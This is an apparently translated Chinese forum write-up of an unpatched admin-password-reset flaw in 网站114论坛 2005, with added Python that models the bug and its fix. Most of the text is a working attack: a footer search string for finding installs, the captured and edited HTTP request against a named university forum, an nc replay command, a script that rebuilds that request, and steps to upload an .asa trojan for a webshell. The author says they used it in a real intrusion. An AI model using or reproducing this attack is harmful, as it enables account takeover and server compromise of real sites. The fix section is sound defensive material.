网站114论坛 2005 Official Edition vulnerability
Search keyword (footer string that identifies installs):
"版权所有 设计制作:网站114"
Vulnerability description:
网站114论坛 2005 Official Edition
/edituserdb.asp (the profile-edit page) posts to SaveUser_Account.asp,
which does not check the submitted data against the cookie-based session: the account it updates is taken from the posted txtUserCode field rather than from the logged-in user.
As a result any registered user can overwrite the administrator's password.
Default backend: admin/index.asp
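To make the authorization flaw concrete, here is an added example (not code from 网站114论坛 or from the original post) that models the update handler with an in-memory user table. The form field names match the captured request; the handler logic, the password hashing and the sample users are assumptions. The vulnerable version picks the row to update from the posted txtUserCode, the hardened version uses only the session identity.

```python
"""Added example: SaveUser_Account-style handler, vulnerable and fixed.
Field names come from the captured form; everything else is assumed."""
import hashlib
from typing import Optional, Tuple


def hash_pw(password: str) -> str:
    # Hashing scheme is an assumption; the forum's real storage is unknown.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_users() -> dict:
    # Constructed sample table: the built-in admin and the attacker's account.
    return {
        "admin": {"password": hash_pw("s3cret-admin-pw"), "role": "admin"},
        "33221": {"password": hash_pw("33221"), "role": "member"},
    }


def login(users: dict, user: str, password: str) -> bool:
    row = users.get(user)
    return row is not None and row["password"] == hash_pw(password)


def _validate(form: dict) -> Optional[str]:
    if form.get("txtPassword") != form.get("txtConfirmPassword"):
        return "passwords differ"
    if not form.get("txtPassword"):
        return "empty password"
    return None


def save_user_account_vulnerable(users: dict, form: dict, session: dict) -> str:
    """Reconstruction of the bug: the row to update is chosen from the posted
    txtUserCode, so any logged-in member can overwrite any account's password."""
    if "user" not in session:
        return "login required"
    err = _validate(form)
    if err:
        return err
    target = form["txtUserCode"]          # attacker-controlled
    if target not in users:
        return "no such user"
    users[target]["password"] = hash_pw(form["txtPassword"])
    return "profile updated"


def save_user_account_fixed(users: dict, form: dict, session: dict) -> str:
    """Hardened handler: the account comes from the authenticated session only;
    a txtUserCode that disagrees with it is rejected instead of trusted."""
    if "user" not in session:
        return "login required"
    target = session["user"]
    if form.get("txtUserCode", target) != target:
        return "forbidden"
    err = _validate(form)
    if err:
        return err
    users[target]["password"] = hash_pw(form["txtPassword"])
    return "profile updated"


def demo() -> Tuple[bool, bool]:
    """Replays the writeup: member 33221 posts txtUserCode=admin with password
    33221. Returns whether admin/33221 logs in afterwards under the vulnerable
    handler and under the fixed one."""
    form = {"txtUserCode": "admin", "txtPassword": "33221",
            "txtConfirmPassword": "33221"}
    session = {"user": "33221"}           # identity behind the ASPSESSIONID cookie

    vuln = make_users()
    save_user_account_vulnerable(vuln, form, session)
    fixed = make_users()
    save_user_account_fixed(fixed, form, session)
    return login(vuln, "admin", "33221"), login(fixed, "admin", "33221")


if __name__ == "__main__":
    print(demo())   # (True, False)
```

The fix is not input validation on txtUserCode but dropping it as a source of truth: the identity that an update applies to must come from the server-side session, and a client-supplied value that disagrees with it is a reason to refuse the request.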
I used it today while attacking a machine in a server room by way of a neighbouring site on the same host (旁注).
http://www.gxmu.net.cn/xzl/BBS/index.asp
A forum on the Guangxi Medical University website.
I registered a user, 33221.
Then I went to /edituserdb.asp, clicked "Modify registration" and started capturing the request.
The captured request, saved to Notepad, is:
-----------------------------------------------------------------------------------------------------------
POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.gxmu.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.gxmu.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"
老师
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"
11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"
111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"
修正注册信息
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"
-----------------------------7d61e41d605f6--
------------------------------------------------------------------------------------------------------------
The part that matters is the first five fields:
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Change the first "33221" (the txtUserCode value) to "admin" and save the result as 11.txt:
POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.gxmu.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.gxmu.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
admin
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"
老师
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"
11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"
111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"
修正注册信息
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"
-----------------------------7d61e41d605f6--
Because the username I registered, 33221, is the same length as admin, the Content-Length header does not need to change. If the new value has a different length, recompute Content-Length as the byte count of the body (a Chinese character such as in 老师 is 2 bytes in GBK and 3 in UTF-8, not 1); a wrong value makes the server truncate the body or wait for bytes that never come. Note also that the paste above has lost its blank lines: a real request needs an empty line between the headers and the body, and one between each part's Content-Disposition line and its value, or the multipart form will not parse.
Then submit it to the server with nc:
nc www.gxmu.net.cn 80 <11.txt
The response says the member profile was modified successfully.
Then log in as admin with 33221, the password I chose when registering.
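The capture-edit-resend procedure above, as an added example that is not part of the original post or the forum project: it rebuilds the captured multipart/form-data request in code so that Content-Length is computed from the real body bytes instead of being hand-edited, and shows that swapping txtUserCode from 33221 to admin leaves the length unchanged while a longer name does not. Host, path, boundary, cookie and field names are copied from the capture; the page charset (gbk) is an assumption, and browser headers the server does not need are dropped.

```python
"""Added example: rebuild the captured request with a correct Content-Length.
Values marked 'from capture' are copied from the post; the charset is assumed."""
HOST = "www.gxmu.net.cn"                                   # from capture
PATH = "/xzl/BBS/SaveUser_Account.asp"                     # from capture
BOUNDARY = "---------------------------7d61e41d605f6"      # Content-Type boundary, from capture
COOKIE = "ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME"   # from capture
CHARSET = "gbk"   # assumption: IE sends form values in the page charset, GB2312/GBK for zh-cn


def form_fields(user_code: str, password: str = "33221"):
    """The profile form as captured; user_code is the txtUserCode value that the
    vulnerable handler uses to pick which row to update."""
    return [
        ("txtUserCode", user_code),
        ("txtPassword", password),
        ("txtConfirmPassword", password),
        ("txtQuestion", "33221"),
        ("txtAnswer", "33221"),
        ("txtUserName", "33221"),
        ("selSex", "老师"),
        ("txtNick", "11"),
        ("txtProvince", "111"),
        ("txtfile", "", ""),            # empty file part: (name, data, filename)
        ("submit", "修正注册信息"),
        ("txtId", ""),
        ("txtTempId", ""),
    ]


def build_multipart(fields, boundary=BOUNDARY, charset=CHARSET) -> bytes:
    """Encodes fields the way a browser does: each part opens with '--' + boundary,
    a Content-Disposition line, a blank line, then the value; the body closes
    with '--' + boundary + '--'. Every line break is CRLF."""
    out = []
    for field in fields:
        name, value = field[0], field[1]
        filename = field[2] if len(field) > 2 else None
        out.append(f"--{boundary}\r\n".encode("ascii"))
        disposition = f'Content-Disposition: form-data; name="{name}"'
        if filename is not None:
            disposition += f'; filename="{filename}"\r\nContent-Type: application/octet-stream'
        out.append((disposition + "\r\n\r\n").encode(charset))
        out.append(value.encode(charset) + b"\r\n")
    out.append(f"--{boundary}--\r\n".encode("ascii"))
    return b"".join(out)


def build_request(fields, host=HOST, path=PATH, cookie=COOKIE) -> bytes:
    """Full HTTP/1.1 request suitable for `nc host 80 < file`: Content-Length is
    the byte length of the body and a blank line separates headers from body."""
    body = build_multipart(fields)
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        f"Referer: http://{host}/xzl/BBS/edituserdb.asp",
        f"Content-Type: multipart/form-data; boundary={BOUNDARY}",
        f"Content-Length: {len(body)}",
        f"Cookie: {cookie}",
        "Connection: close",
    ]
    return "\r\n".join(headers).encode("ascii") + b"\r\n\r\n" + body


def length_difference(old_user: str, new_user: str) -> int:
    """Bytes by which Content-Length changes when txtUserCode is swapped."""
    return (len(build_multipart(form_fields(new_user)))
            - len(build_multipart(form_fields(old_user))))


if __name__ == "__main__":
    print(length_difference("33221", "admin"))          # 0: header can stay as captured
    print(length_difference("33221", "administrator"))  # 8: header must be updated
    print(build_request(form_fields("admin")).decode(CHARSET))
```

Redirect the printed request to a file and it can be fed to nc exactly as in the writeup; because the body is built from bytes, the length stays right whatever charset or field values are used.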
That is administrator privileges. Log into the backend, click "Edit columns", upload an .asa trojan, and you have a webshell.
I checked: there is no patch for this forum system yet, so plenty of webshells could be collected, but I only took the one server that was useful to me and did not go after the rest.
If anything is unclear, see the animated demo: http://www.ncph.net/soft/114论坛最新漏洞使用动画.rar
A trivial bug; I wrote this for beginners, so experts please go easy on me.
- Article author: 福州军威计算机技术有限公司
Copyright notice: original work; reproduction is permitted provided the original source, author and this notice are credited with a hyperlink. Otherwise legal action will be pursued.